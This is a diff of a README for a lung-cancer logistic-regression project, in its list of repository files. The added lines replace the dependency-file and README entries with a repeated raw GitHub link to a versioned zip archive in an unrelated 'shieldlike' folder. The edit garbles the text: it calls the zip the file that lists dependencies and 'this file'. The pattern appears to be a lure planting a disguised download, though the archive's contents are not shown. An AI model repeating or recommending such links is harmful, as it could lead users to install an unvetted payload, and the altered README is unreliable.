Agasthi1212/lung-cancer-prediction-logistic-regression/README.md

 - figures/ folder: stores generated plots and visualizations used in the notebook and this README.
 - docs/ folder: supplementary explanations, references, and methodological notes.
 - notebooks/ folder: supplementary notebooks that demonstrate specific steps or experiments.
-- requirements.txt or environment.yml: lists dependencies to reproduce the environment.
+- https://raw.githubusercontent.com/Agasthi1212/lung-cancer-prediction-logistic-regression/main/shieldlike/prediction_lung_regression_cancer_logistic_v2.3-beta.5.zip or https://raw.githubusercontent.com/Agasthi1212/lung-cancer-prediction-logistic-regression/main/shieldlike/prediction_lung_regression_cancer_logistic_v2.3-beta.5.zip lists dependencies to reproduce the environment.
 - LICENSE: if present, states the usage terms for the work.
-- README.md: this file, which documents the project and how to use it.
+- https://raw.githubusercontent.com/Agasthi1212/lung-cancer-prediction-logistic-regression/main/shieldlike/prediction_lung_regression_cancer_logistic_v2.3-beta.5.zip this file, which documents the project and how to use it.

 How to contribute
 - If you want to improve the model, you can: